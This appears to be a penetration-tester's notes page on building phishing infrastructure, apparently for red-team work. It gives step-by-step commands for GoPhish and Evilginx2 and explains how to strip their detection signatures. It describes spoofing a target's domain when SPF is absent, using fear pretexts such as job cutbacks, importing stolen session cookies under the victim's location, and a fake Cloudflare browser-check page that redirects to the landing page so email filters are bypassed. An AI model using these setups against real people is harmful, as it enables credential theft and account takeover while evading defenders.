Phishing Infrastructure

Reference

BHIS Webcast

Configuration Overview

Domain Name

Reference

Insomniacsecurity

After you buy a domain set the name server records to Digital Ocean.

Buying Expired Domains

expireddomains.net
https://altcodeunicode.com/
Domainhunter [Github]
- Finding a domain based on keyword
- Checks categorization against Bluecoat and IBM XForce.
- Check IP History of Domain

Adding Content to Domain [Wayback machine]

If you want this url: https://web.archive.org/web/20121107182523/http://www.treeserviceorlando.net but without the WebArchive toolbar?

Add “id_” before the referenced url: https://web.archive.org/web/20121107182523id_/http://www.treeserviceorlando.net

Please note: The Wayback Machine doesn’t download jpgs or stylesheets when you add the “id_” to the url. Simply wget the regular version (with the toolbar, jpgs and style sheets), then wget the “id_” version later. It will write over the htmls w/ versions that don’t include the toolbar, and leave the rest in place.

Free/Paid HTML Templates

Get one page HTML pages.
Addition resources can be hosted on an S3 bucket.

Domain Categorization

During OSINT identify which internal proxy firewall technology the target is using.

Submit for review on Symantec
Manipulate Domain Categorization: Chameleon
DNSChecker
Fortigate
Mcaffe
Palo Alto
BrightCloud
Cisco Talos
IBM X-Force

GoPhish

Send Phish
Track interaction
Landing-page Hosting

Setup

Install Kali. Refer this
- Firewall Rule sets:
  - ufw allow proto tcp from any to any port 80,443 [Landing page]
  - ufw allow 22
  - ufw allow 8080 [Gophish Admin page]
- Setup tmux : Refer this
Set up a certificate using Let'sEncrypt.

snap install core
snap refresh core
snap install --classic certbot
sudo certbot --nginx
#Enter when prompted
domain.com <space> www.domain.com

wget <gophish URL.zip>
apt install unzip
unzip gophish.zip 
chmod +x gophish
#update Gophish listening address in its config file config.json. 
#Use your favorite editor and change listen_url to 0.0.0.0:port_number
./gophish

#Copy certs to GoPhish Directory 
# cp /etc/letsencrypt/live/[DOMIAN]/privkey.pem [DOMAIN].key 
# /etc/letsencrypt/live/[DOMAIN]/fullchain.pem [DOMAIN].crt
#Update config.json [Phish Server Param]

Setup the Sending Profile. Test with temp mails. If target does not have SPF records, you can send using their domain to improve trust factor.
Setup the landing page using 'Import URL' feature.
Setup up the Email Template.
- Use stripo to create beautiful HTML emails.
- After copying to email template, replace the URL with {{.URL}}
- Be creative with the pretense. Use the element of fear. Eg: Job cutbacks.
Clone a website using landing page feature on GoPhish.
Launch campaign

IOCs

Remove X-Mail Header value: gophish [Sending Profile settings]
Change Default RID parameter to anything else to avoid signatures. Eg: http://<URL>?rid=123

#https://github.com/gophish/gophish/blob/master/models/campaign.go#L123
#Change this
const RecipientParameter = "rid"

Nginx

HTTP Proxy/Router
BLOCK all scanning
Host multiple websites
Let'sEncrypt/SSL

Evilginx2

Setup Article
Setting up for o365 Phishing: [Link]

apt-get update
apt-get install nginx certbot python3-certbot-nginx git golang-go unzip net-tools
apt install git make

sudo service nginx restart
nginx -t && nginx -s reload

#Set up SSL certs with LetsEncrypt
sudo certbot --nginx -d <example.com> -d <www.example.com>

#Append to /etc/resolv.conf
nameserver 8.8.8.8

#Disable any other DNS services
sudo systemctl stop systemd-resolved


cd /opt
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
#Install globally
make install
	
evilginx

config domain <Domain name>
config ip <IP>

IOCs

Remove the Signature Evilginx Headers from http_proxy.go

#https://github.com/kgretzky/evilginx2/blob/master/core/http_proxy.go
#Grep for ' := []byte '

hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
e := []byte{208, 165, 205, 254, 225, 228, 239, 225, 230, 240}

Inject Stolen Cookies

Cookie Editor Extension [Mozilla extension] -> Import stolen cookie
Change source-IP to that of Victim's location to avoid suspicious logs.

SMTP Servers

Use Valid Mail server providers to gain reputation.

Deploy SMTP Server in VPS

Postfix-Server-Setup : Remove sensitive information from email headers.

Rate Emails

Mail-tester.com

Powershell: Send-MailMessage

Reference: Link

Send-MailMessage -To “<recipient’s email address>” -From “<sender’s email address>”  -Subject “Your message subject” -Body “Some important plain text!” -Attachments .\data.csv -SmtpServer “<smtp server>” -Port 25

SendGrid

Use a valid domain to create free email IDs & send mails to targets

Mailgun

Documentation

curl -s --user 'api:<API-KEY-HERE>' \
    https://api.eu.mailgun.net/v3/<YOUR-DOMAIN-HERE>/messages \
    -F from='First Last name<noreply@YOUR-DOMAIN-HERE>' \
    -F to=<REcipient> \
    -F subject='Hello' \
    -F text='Notification'

Analyze email content for spam score

Test Sending Emails with mailtrap.io
Use a proxy website URL while sending mails to redirect to landing page. This bypasses Email Filters and prevents scanners from flagging your landing domain as malicious.

<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>Just a moment...</title>
</head>
<body>
<table width="100%" height="100%" cellpadding="30">
<tr>
<td align="center" valign="center">
<h1>Checking your browser</h1>
<div id="challenge" style="display:none;">
<p>This process is automatic. Your browser will redirect to your requested content shortly.</p>
<p>Please allow up to 5 seconds...</p>
</div>
<div style="margin-top:20px;">
<a href="http://www.cloudflare.com/" target="_blank" style="font-size: 12px;">DDoS protection by CloudFlare</a>
</div>
</td>
</tr>
</table>
<script>setTimeout(function(){
            window.location.href = "<INSERT-YOUR-LANDING-PAGE-HERE>";
         },4000);
      </script>
</body>
</html>

Redirectors

#DNS Redirector
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<DEST IP>; echo -ne

#HTTP Redirector
socat TCP4-LISTEN:80,bind=<Interface IP>,fork TCP4:<DEST IP>:80